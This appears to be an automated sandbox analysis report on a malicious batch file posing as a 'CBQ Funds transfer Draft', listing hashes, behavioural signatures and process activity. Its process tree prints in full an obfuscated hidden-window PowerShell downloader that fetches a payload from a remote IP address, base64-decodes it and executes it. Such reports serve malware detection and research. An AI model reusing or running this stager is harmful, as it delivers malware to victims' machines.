Analysis
-
max time kernel
147s -
max time network
143s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
10/06/2024, 16:13
Static task
static1
Behavioral task
behavioral1
Sample
CBQ Funds transfer DraftUdkikspostens44.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
CBQ Funds transfer DraftUdkikspostens44.bat
Resource
win11-20240419-en
General
-
Target
CBQ Funds transfer DraftUdkikspostens44.bat
-
Size
6KB
-
MD5
84cb66117acd5104ada1321c3b472f94
-
SHA1
ee6ca999a1798296139fc0eddca01b10d955e00d
-
SHA256
7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
-
SHA512
483f0f275710dfceef0af0da3ddf3b72a52a80ab788d31fca647e3a28d585f1feedffad182baa9b1ba70e32b8e671c6823b74352db950ad27fd3f3d71ced349e
-
SSDEEP
192:Fk33ynxcIG+cPPX99/PdQ9LXJICyD+QRK:FkSmtnN5FQpJJ
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 1 2556 powershell.exe 2 2556 powershell.exe 7 2556 powershell.exe 9 2556 powershell.exe 10 2556 powershell.exe 11 2556 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2556 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2556 powershell.exe 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4732 wrote to memory of 2556 4732 cmd.exe 78 PID 4732 wrote to memory of 2556 4732 cmd.exe 78 PID 2556 wrote to memory of 1744 2556 powershell.exe 80 PID 2556 wrote to memory of 1744 2556 powershell.exe 80
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"3⤵PID:1744
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82